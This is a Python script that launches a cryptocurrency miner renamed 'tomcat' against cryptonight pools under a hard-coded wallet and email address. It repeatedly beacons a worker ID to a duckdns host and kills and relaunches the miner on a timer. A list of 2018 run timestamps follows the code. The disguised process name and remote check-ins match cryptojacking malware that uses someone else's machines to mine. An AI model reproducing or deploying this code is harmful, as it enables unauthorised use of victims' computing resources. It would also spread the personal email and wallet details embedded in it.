import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:06.722798
#2018-02-17 16:18:05.236490
#2018-02-17 18:05:07.830413
#2018-02-17 19:54:01.353906
#2018-02-17 21:41:07.125465
#2018-02-17 23:25:03.016239
#2018-02-18 01:14:06.108171
#2018-02-18 03:02:03.914128
#2018-02-18 04:49:04.332147
#2018-02-18 06:40:08.645028
#2018-02-18 08:29:06.421193
#2018-02-18 10:16:05.653856
#2018-02-18 12:02:06.620332
#2018-02-18 13:47:05.083524
#2018-02-18 15:39:02.072755
#2018-02-18 17:28:05.618897
#2018-02-18 19:16:07.049363
#2018-02-18 21:03:03.584147
#2018-02-18 22:49:07.094688
#2018-02-19 00:38:01.338789
#2018-02-19 02:24:07.512334
#2018-02-19 04:11:05.362850
#2018-02-19 05:55:08.035140
#2018-02-19 07:43:01.863737
#2018-02-19 09:32:01.468860
#2018-02-19 11:22:07.623186
#2018-02-19 13:09:01.696711
#2018-02-19 14:56:04.597260
#2018-02-19 16:46:15.170941
#2018-02-19 18:34:06.050835
#2018-02-19 20:19:06.200156
#2018-02-19 22:08:07.714952
#2018-02-19 23:54:06.547744
#2018-02-20 01:41:04.614875
#2018-02-20 03:29:07.258626
#2018-02-20 05:16:06.571477
#2018-02-20 06:58:05.720990
#2018-02-20 08:45:07.810805
#2018-02-20 10:29:06.012911
#2018-02-20 12:14:08.603088
#2018-02-20 14:02:06.344628
#2018-02-20 15:47:08.601955
#2018-02-20 17:34:07.099896
#2018-02-20 19:23:06.345406
#2018-02-20 21:11:05.591049
#2018-02-20 22:57:04.937977
#2018-02-21 00:41:05.424340
#2018-02-21 02:28:05.841465
#2018-02-21 04:13:06.687651
#2018-02-21 06:01:05.080577
#2018-02-21 07:49:04.040753
#2018-02-21 09:35:06.870789
#2018-02-21 11:24:07.494992
#2018-02-21 13:13:07.210648
#2018-02-21 14:58:09.347139
#2018-02-21 16:46:06.825272
#2018-02-21 18:36:07.559260
#2018-02-21 20:21:08.070922
#2018-02-21 22:09:01.612853
#2018-02-21 23:59:05.433715
#2018-02-22 01:47:03.598426
#2018-02-22 03:36:08.041115
#2018-02-22 05:23:01.232941
#2018-02-22 07:07:02.008159
#2018-02-22 08:53:06.606366
#2018-02-22 10:41:08.847901
#2018-02-22 12:27:07.127224
#2018-02-22 14:12:08.499136
#2018-02-22 15:59:07.489152
#2018-02-22 17:46:06.495715
#2018-02-22 19:33:02.103390
#2018-02-22 21:25:07.640092
#2018-02-22 23:12:04.275534
#2018-02-23 00:59:07.800407
#2018-02-23 02:46:06.668947
#2018-02-23 04:35:05.428147
#2018-02-23 06:21:08.019195
#2018-02-23 08:09:08.064212
#2018-02-23 10:27:04.911586
#2018-02-23 12:19:08.433368
#2018-02-23 14:08:08.265899
#2018-02-23 15:58:06.214301
#2018-02-23 17:46:06.139270
#2018-02-23 19:33:08.054421
#2018-02-23 21:17:06.855780
#2018-02-23 23:04:05.132197
#2018-02-24 00:51:06.644502
#2018-02-24 02:42:06.425597
#2018-02-24 05:27:05.297183
#2018-02-24 07:14:05.070996
#2018-02-24 09:04:01.684386
#2018-02-24 11:03:05.351450
#2018-02-24 12:52:05.628311
#2018-02-24 14:40:04.300553
#2018-02-24 16:29:06.533422
#2018-02-24 18:20:08.289103
#2018-02-24 20:06:07.575348
#2018-02-24 21:49:06.581200
#2018-02-25 01:51:04.398073
#2018-02-25 04:53:06.313503
#2018-02-25 08:19:01.520659